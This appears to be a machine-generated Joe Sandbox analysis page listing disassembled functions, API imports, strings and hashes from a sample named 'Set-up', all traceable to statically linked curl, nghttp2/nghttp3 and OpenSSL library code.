Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strrchr$_stat64
String ID: mime.c
API String ID: 2771713950-3378952128
Opcode ID: 833a91a583042cc7df2ca1a11ac22264742ebcfdcc142334fed4cb67e37d9f44
Instruction ID: 9135b9d55d8f362bd46f56e476c1233f683fcc106acf1357583921cc43c6cf20
Opcode Fuzzy Hash: 833a91a583042cc7df2ca1a11ac22264742ebcfdcc142334fed4cb67e37d9f44
Instruction Fuzzy Hash: C851C2B1A047429BEB109F24DC86F663AA4DF41B14F18026CFC589F3C6EBB5D9449BA1

Function 00E46710 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?,00E33B19,?,?,?,?,?), ref: 00E4671D
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000002C,?,?), ref: 00E4682B

Strings

curl_ntlm_core.c, xrefs: 00E4672F, 00E46865
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c, xrefs: 00E467FF

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _time64memcpy
String ID: %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c$curl_ntlm_core.c
API String ID: 1622878224-1914695719
Opcode ID: c505a83e07f8206ac8024b83a94bde54eeb59f447455a8405ce609047de2999c
Instruction ID: a4764d4af08c7f47b7601436ebdc4547ee402ff605f1e6b475d9ccc8352ad96a
Opcode Fuzzy Hash: c505a83e07f8206ac8024b83a94bde54eeb59f447455a8405ce609047de2999c
Instruction Fuzzy Hash: 45417BB29087049BC314DF69D88166BF7F4EFD9704F048A1EF9889B351E770D8948B52

Function 00E04380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111stringnetworkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 00E043D8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E04409
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00E04457

Strings

curl_addrinfo.c, xrefs: 00E04429, 00E044C3

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: htonsmemcpystrlen
String ID: curl_addrinfo.c
API String ID: 2973076469-1838508774
Opcode ID: b0c7f5f9ff7e089a401a089251f9d6ea2ffe172f604f61de2cfb291b0096db7d
Instruction ID: e67546d8eb6559532486d60abc820647937a23067fa9ba1f4f3d821aa6da8690
Opcode Fuzzy Hash: b0c7f5f9ff7e089a401a089251f9d6ea2ffe172f604f61de2cfb291b0096db7d
Instruction Fuzzy Hash: 49419BF5A04705AFD700DF55C580A6AB7E4FF98318F04892DEE999B390E330E990DB91

Function 00DF6650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 00DF665D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DF670E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 00DF671C

Strings

altsvc.c, xrefs: 00DF6699, 00DF66AB, 00DF66BD

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen$_time64
String ID: altsvc.c
API String ID: 2413861649-3234676706
Opcode ID: 3a434cbc98795673463d57d5fab39d1933e4dcb55a78d08a4cac2c6d8bddb5f5
Instruction ID: 0afcf3855d86b23ea75c2c3dc2d1701c394b5e0bb8e0410b47d967b511cdc038
Opcode Fuzzy Hash: 3a434cbc98795673463d57d5fab39d1933e4dcb55a78d08a4cac2c6d8bddb5f5
Instruction Fuzzy Hash: B031B2B1E04305ABD710AE60AC82E3B77E4AB94759F09853CFA4D97641F631ED04CBB2

Function 00E642E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 00E6435F
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 00E643EF

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00E6435A, 00E643EA
nghttp3_conn.c, xrefs: 00E64355, 00E643E5

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 36790c4688bebae20264c78a247eed3246d09413c93d74a0bcd530363316de02
Instruction ID: b4e48d1a586b966c199d21d85ecebcbbabd7d668675f6f7f02378e07026ee918
Opcode Fuzzy Hash: 36790c4688bebae20264c78a247eed3246d09413c93d74a0bcd530363316de02
Instruction Fuzzy Hash: 5931A672580245AFD7119F54FC09F9A37E9EF45359F0904B8F804AB2A3E772E928C7A1

Function 00E6A090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,00E670DF,00000001,?,?,?), ref: 00E6A0E5

Part of subcall function 00E6A140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 00E6A29A

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,00E670DF,00000001,?,?,?), ref: 00E6A135

Strings

nghttp3_ksl.c, xrefs: 00E6A12B
ksl->head, xrefs: 00E6A130

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assertmemcpymemmove
String ID: ksl->head$nghttp3_ksl.c
API String ID: 374949274-2784241221
Opcode ID: 587eaa9c10cd610700162e14c394e318ba501c133fa4dda4cfdcebae36760e23
Instruction ID: e3cb4a3c1537f13218941e5fb60643f28122fde75c51b4ae9c382f4dfda93962
Opcode Fuzzy Hash: 587eaa9c10cd610700162e14c394e318ba501c133fa4dda4cfdcebae36760e23
Instruction Fuzzy Hash: 611193706412059FDB149F04E88595AF7A6FF8A748F1CE56EE8496B741D330EC80CFA1

Function 00E5E0D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00E5E148
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp2_buf_avail(buf) >= padlen - 1,nghttp2_frame.c,000004B6,?,?,?,?,00E52615,?,?,?,?), ref: 00E5E16E

Strings

nghttp2_buf_avail(buf) >= padlen - 1, xrefs: 00E5E169
nghttp2_frame.c, xrefs: 00E5E164

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assertmemset
String ID: nghttp2_buf_avail(buf) >= padlen - 1$nghttp2_frame.c
API String ID: 1036001119-2332821266
Opcode ID: e416e85889831636578de1f912ea80c9c672a88c64a4b55f9555552fd0ba447e
Instruction ID: ff1c1faa9780a071e7ba881381725e6acfbf59743af8d700ebd7bfb2420d792b
Opcode Fuzzy Hash: e416e85889831636578de1f912ea80c9c672a88c64a4b55f9555552fd0ba447e
Instruction Fuzzy Hash: 2111EEB1A40B4AAFC300CF24D844E05F7A5FF9532AF04C659E8581B312D771E928CB90

Function 00DF88C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

getsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00DF893B
setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00DF8960

Part of subcall function 00DE7620: GetModuleHandleA.KERNEL32(ntdll), ref: 00DE763F
Part of subcall function 00DE7620: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 00DE764B
Part of subcall function 00DE7620: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,0000010C), ref: 00DE7695
Part of subcall function 00DE7620: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 00DE76D3
Part of subcall function 00DE7620: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 00DE76DA
Part of subcall function 00DE7620: VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 00DE76E4
Part of subcall function 00DE7620: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00DE76EB
Part of subcall function 00DE7620: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00DE76FC

Strings

@, xrefs: 00DF8945
@, xrefs: 00DF88C4

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ConditionMask$AddressHandleModuleProcgetsockoptmemsetsetsockopt
String ID: @$ @
API String ID: 2103437208-1089145642
Opcode ID: e17e4ad5da1626157070640790266fe5d5fc47746332de605d228b22314cd151
Instruction ID: d4f66e8e1359e1a824177b68b3953c383eafe3d6c792553776eb4bb6a7229350
Opcode Fuzzy Hash: e17e4ad5da1626157070640790266fe5d5fc47746332de605d228b22314cd151
Instruction Fuzzy Hash: C901D6B0508341ABE7209F14E94E7BA77E4AF40309F06442CFA84563D5E7F58998CB53

Function 00E188C0 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 339COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00E18904

Part of subcall function 00E083F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,0000000E,00DE6AB8,?,013AB7E2), ref: 00E083FB

Strings

?%s, xrefs: 00E18CD3
:%s, xrefs: 00E18A4C, 00E18A98
http.c, xrefs: 00E188DC, 00E1893F, 00E18AB3, 00E18ACB, 00E18AE1, 00E18AF7, 00E18B0D, 00E18BE6, 00E18BFC, 00E18C1F, 00E18C34, 00E18C49, 00E18C78, 00E18CF7

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpystrlen
String ID: :%s$?%s$http.c
API String ID: 3412268980-2899085463
Opcode ID: 595e38b8b0beaf62ff3c73f3d01dff63026fe2d28ebb21660b8dcb9b3068f979
Instruction ID: 1523ee4275762e749914b70b6f66167ea2d1737c41236d8094c10563b705d0c3
Opcode Fuzzy Hash: 595e38b8b0beaf62ff3c73f3d01dff63026fe2d28ebb21660b8dcb9b3068f979
Instruction Fuzzy Hash: 26A13BB5E443017BE7206A21AD83FA776989F5074CF141838F989F62C3FB75D98486B2

Function 00DEC5F0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 275COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00DEC685

Part of subcall function 00DC73F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,00DCCA95,013A6A38,00000467,mprintf.c), ref: 00DC741D
Part of subcall function 00DC73F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00DC7445

Part of subcall function 00DC73F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00DCCA95,013A6A38,00000467,mprintf.c), ref: 00DC7486
Part of subcall function 00DC73F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DC74AA
Part of subcall function 00DC73F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC74B2

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00DEC6CF
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00DEC719

Strings

vtls/vtls.c, xrefs: 00DEC653, 00DEC69D, 00DEC6E7, 00DEC72E, 00DEC756, 00DEC77F, 00DEC7A8, 00DEC7D1, 00DEC7FA, 00DEC823, 00DEC84C, 00DEC875, 00DEC935, 00DEC95F

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpy$__acrt_iob_func_errnofflushstrlen
String ID: vtls/vtls.c
API String ID: 1294796744-169717415
Opcode ID: e8b4191adb78e7c8e6cdf3b89160219232a1bacdc6fd43fe8704c898ef32e15a
Instruction ID: 9f17cd51e10698e5d0372bd8ca39af8acd074c2d8bf90a90adf41abba78e78ac
Opcode Fuzzy Hash: e8b4191adb78e7c8e6cdf3b89160219232a1bacdc6fd43fe8704c898ef32e15a
Instruction Fuzzy Hash: B3A16AB0B107429BDB20AF27DD85B12B7E8EF14744F08552CE958CB682FB75E8518BB4

Function 00F4E720 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 207COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 00F4E9A3

Strings

BN_lshift, xrefs: 00F4E7E2
crypto/bn/bn_shift.c, xrefs: 00F4E7E9
, xrefs: 00F4E992

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memset
String ID: $BN_lshift$crypto/bn/bn_shift.c
API String ID: 2221118986-2228461501
Opcode ID: ecc3aea17e1cb325cbc4bfa2dcc88b7ab3957a2cad9b58fa03f0da7fd0fe99c2
Instruction ID: 0a1d470ba83b0086620b0d70d327f27096b1a54b6d1fb55c1ce24ee5b99212b4
Opcode Fuzzy Hash: ecc3aea17e1cb325cbc4bfa2dcc88b7ab3957a2cad9b58fa03f0da7fd0fe99c2
Instruction Fuzzy Hash: F371EE32A087159BC725DF29C88062AFBA1BFDA710F14872EFDA967391D370AC01CB41

Function 00FB6590 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00FB662C

Part of subcall function 00F77220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F77262
Part of subcall function 00F77220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F77285
Part of subcall function 00F77220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F772C5
Part of subcall function 00F77220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F772E8

Strings

ocsp_match_issuerid, xrefs: 00FB66A9, 00FB66E3, 00FB675D
crypto/ocsp/ocsp_vfy.c, xrefs: 00FB66B3, 00FB66ED, 00FB6767

